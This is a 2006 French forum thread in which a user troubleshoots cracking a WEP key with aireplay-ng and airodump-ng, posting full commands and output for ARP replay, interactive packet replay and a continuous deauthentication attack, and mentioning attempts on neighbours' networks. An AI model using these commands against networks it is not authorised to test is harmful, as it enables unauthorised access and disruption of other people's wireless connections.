les ivs n'augmentent pas ? (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-07-2006 22:31:34

minours
Membre
Inscription : 22-07-2006
Messages : 6

les ivs n'augmentent pas ?

Bonjour à tous,

J'utilise aireplay-ng avec l'attaque -2 et celui-ci à l'air de fonctionner dans la mesure où j'ai pu obtenir un ARP. Aireplay-ng effectue donc l'injection de packets avec un compteur send... Cependant, dans Airodump, la colonne Data n'augmente pas alors que la colonne Packets, elle, augmente joyeusement sur la dernière ligne smile

Je me demande donc comment faire augmenter la colonne Data ?

Avec l'outil ivstools, j'ai pu convertir le fichier .cap d'airodump en un fichier .ivs.
Ivstools m'indique bien un nombre très important d'IVS. Mais lorsque que je lance aircrack avec le fichier .ivs, il ne me trouve que le tout petit nombre de la colonne Data d'airodump.

A noter que j'utilise la carte PC54G3 avec le driver rt61.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-07-2006 00:09:12

Billyboylindien
Membre d'honneur
Inscription : 06-10-2005
Messages : 1 561
Site Web

Re : les ivs n'augmentent pas ?

Un seul ARP ... c'est pas sufisant bien souvent. Il en faut plus, baucoup plus, deja que avec une douzaine c'est just ...

Une attaque 0 en fournirait pas davantage???


Les cartes wifi recommandée et testées
Billyboylindien parle d'informatique (un peu wink ).

Proposez vous aussi vos tutos sur tout les sujets (web, prog, bricolage ...)

Hors Ligne

#3 23-07-2006 11:50:48

minours
Membre
Inscription : 22-07-2006
Messages : 6

Re : les ivs n'augmentent pas ?

Voila où j'en suis :


$>aireplay-ng -2 -b 00:07:CB:55:56:DE -h 00:13:CE:25:44:3E -c FF:FF:FF:FF:FF:FF ra0

        Size: 165, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:07:CB:55:56:DE
         Dest. MAC  =  01:00:5E:7F:FF:FA
        Source MAC  =  00:13:CE:25:44:3E

        0x0000:  0842 0000 0100 5e7f fffa 0007 cb55 56de  .B....^.....UV.
        0x0010:  0013 ce25 443e f032 8658 7400 1b95 89f8  ...%D>.2.Xt.....
        0x0020:  e32d 37ff b226 a851 0fcc 9434 dc7b 5640  .-7..&.Q...4.{V@
        0x0030:  843c e141 7cfa c566 5b19 0c6a 66df 1b69  .<.A|..f[..jf..i
        0x0040:  6e2f aa5a 9fde bf5b be2f 5cdb a153 c05e  n/.Z...[./\..S.^
        0x0050:  1b16 243a b3fd 7a47 9acd 84e9 5bca d3f4  ..$:..zG....[...
        0x0060:  4dc1 7d63 b267 827c 17c0 324a 1919 7bbb  M.}c.g.|..2J..{.
        0x0070:  76b7 d2ee d12e 1341 f295 2df3 a9a1 808f  v......A..-.....
        0x0080:  32e5 116d 65ab 0fd8 a979 98ff fa18 aad0  2..me....y......
        0x0090:  9e79 256f d812 de41 d6c7 4f8f 5621 7eb6  .y%o...A..O.V!~.
        0x00a0:  fa64 d623 1e                             .d.#.

Use this packet ? y

Saving chosen packet in replay_src-0723-122743.cap
You should also start airodump-ng to capture replies.

Sent 71032 packets...



// En même temps, je laisse le airodump tourner :

$>airodump-ng -c 5 -w dump ra0


CH  5 ][ Elapsed: 8 mins ][ 2006-07-23 12:32

BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

00:07:CB:55:56:DE   -1     4694        9   5  48  WEP   Yannick

BSSID              STATION            PWR  Packets  Probes

00:07:CB:55:56:DE  00:13:CE:25:44:3E   -1       15  Yannick

// La colonne Data n'augmente pas malgré le aireplay qui tourne sad



// ---------------------------------------------------------------------------------

// Avec une autre attaque :

$>aireplay-ng -0 0 -a 00:07:CB:55:56:DE -c 00:13:CE:25:44:3E ra0
12:39:11  Sending DeAuth to station   -- STMAC: [00:13:CE:25:44:3E]
12:39:11  Sending DeAuth to station   -- STMAC: [00:13:CE:25:44:3E]
12:39:12  Sending DeAuth to station   -- STMAC: [00:13:CE:25:44:3E]
12:39:13  Sending DeAuth to station   -- STMAC: [00:13:CE:25:44:3E]
12:39:14  Sending DeAuth to station   -- STMAC: [00:13:CE:25:44:3E]
12:39:14  Sending DeAuth to station   -- STMAC: [00:13:CE:25:44:3E]
12:39:15  Sending DeAuth to station   -- STMAC: [00:13:CE:25:44:3E]


// Voici le résultat de airodump


CH  5 ][ Elapsed: 14 mins ][ 2006-07-23 12:39

BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

00:07:CB:55:56:DE   -1     8462       40   5  48  WEP   Yannick

BSSID              STATION            PWR  Packets  Probes

00:07:CB:55:56:DE  00:13:CE:25:44:3E   -1     1585  Yannick

// Avec l'attaque -0, le nombre de Packets augmente rapidement mais pas la colonne Data.

A votre avis, qu'est-ce qui me manque ? je suis pas loin ?
En vous remerciant !

Hors Ligne

#4 23-07-2006 13:17:46

Billyboylindien
Membre d'honneur
Inscription : 06-10-2005
Messages : 1 561
Site Web

Re : les ivs n'augmentent pas ?


Les cartes wifi recommandée et testées
Billyboylindien parle d'informatique (un peu wink ).

Proposez vous aussi vos tutos sur tout les sujets (web, prog, bricolage ...)

Hors Ligne

#5 23-07-2006 13:18:23

zac
Membre d'honneur
Inscription : 22-06-2006
Messages : 678

Re : les ivs n'augmentent pas ?

Tu as essayé avec une attaque -3 ? Généralement si tu as 1 arp, ça augmentera et aussi les ivs !

Hors Ligne

#6 23-07-2006 13:54:39

minours
Membre
Inscription : 22-07-2006
Messages : 6

Re : les ivs n'augmentent pas ?

J'ai essayé l'attaque -3. Sur le poste client, j'ai effectué une série de
connexion/déconnexion pour pouvoir augmenter le nombre d'ARP facilement.

Après 12 minutes, la colonne Data n'augmente toujours pas...


$>aireplay-ng -3 -b 00:07:CB:55:56:DE -h 00:13:CE:25:44:3E ra0
open(/dev/rtc) failed: No such file or directory
Saving ARP requests in replay_arp-0723-143630.cap
You should also start airodump-ng to capture replies.
Read 6029 packets (got 23 ARP requests), sent 126654 packets...


// Résultat de airodump-ng

CH  5 ][ Elapsed: 12 mins ][ 2006-07-23 14:46

BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

00:07:CB:55:56:DE   -1     7360      265   5  48  WEP   Yannick

BSSID              STATION            PWR  Packets  Probes

(not associated)   00:0E:35:BC:1D:3E   -1      124  IndexMM52,linksys,123MM2,I
00:07:CB:55:56:DE  00:13:CE:25:44:3E   -1   129643  Yannick,MOMO


Peut être que la ligne, "open(/dev/rtc) failed: No such file or directory" pose
des problèmes ?

Hors Ligne

#7 23-07-2006 13:59:04

zac
Membre d'honneur
Inscription : 22-06-2006
Messages : 678

Re : les ivs n'augmentent pas ?

Oui je crois aussi, tu as une autre carte, dongle... wifi connecté sur ton pc ? (pas celle que tu utilises pour faire l'attaque)

Hors Ligne

#8 23-07-2006 14:11:34

minours
Membre
Inscription : 22-07-2006
Messages : 6

Re : les ivs n'augmentent pas ?

En fait, j'ai commandé une carte PC54G2 (chip rt2500) pour que tout fonctionne mais ils m'ont envoyé un PC54G3 (chip rt61). Arf, la personne qui a préparé ma commande pensait surement bien faire smile

Si vous me confirmez que mes manipulations sont corrects, je vais demander à me la faire échanger voire rembourser.

Quelqu'un a déjà fait fonctionné un chipset rt61 ?

Merci de votre aide.

Hors Ligne

#9 23-07-2006 14:34:54

zac
Membre d'honneur
Inscription : 22-06-2006
Messages : 678

Re : les ivs n'augmentent pas ?

Si tu peux la passer en monitor et faire des injections, Pourquoi l'échanger ? Essaye de cracker une autre wep que la tienne ! Celle du voisin par exemple (en lui demandant l'autorisation). Moi j'avais eu ce problème "open(/dev/rtc) failed: No such file or directory" car j'avais deux périphérique wifi (une d-link dwl g650 qui me servait pour l'attaque et une dongle usb netgear wg111) j'ai retiré ma wg111 et plus de problème. Peut-être que ça n'avais rien à voir... Essaye de crée du traffic sur ton réseau (lance un peer to peer ou un gros téléchargement) wink

Hors Ligne

#10 23-07-2006 14:51:22

minours
Membre
Inscription : 22-07-2006
Messages : 6

Re : les ivs n'augmentent pas ?

Un chose aussi : le script airmon m'indique interface ra0, chipset Unknown et Driver Unknown (Monitor mode not supported). Par contre dans le iwconfig ra0, le mode monitor est bien positionné.

J'ai aussi essayé chez deux voisins mais la colonne Data n'augmente pas non plus.  C'est le même résultat que sur mon propre réseau. Je vais essayé de suivre le cvs du driver rt61.

Hors Ligne

#11 23-07-2006 15:12:37

zac
Membre d'honneur
Inscription : 22-06-2006
Messages : 678

Re : les ivs n'augmentent pas ?

Ok tu as les mêmes info que pour wg111 et avec je peut rien faire hmm Si tu utilises un distribution linux (pas un live cd) essaye de voir si il y aurait des d'autre drivers... Sinon achète une carte avec un chipset atheros smile

Hors Ligne

#12 23-07-2006 15:23:44

minours
Membre
Inscription : 22-07-2006
Messages : 6

Re : les ivs n'augmentent pas ?

Merci pour ton aide ! smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
4 1539 06-12-2009 18:10:36 par no-body71
2 942 04-09-2008 15:32:14 par dédé
4 1039 16-11-2007 18:35:55 par wxcvbn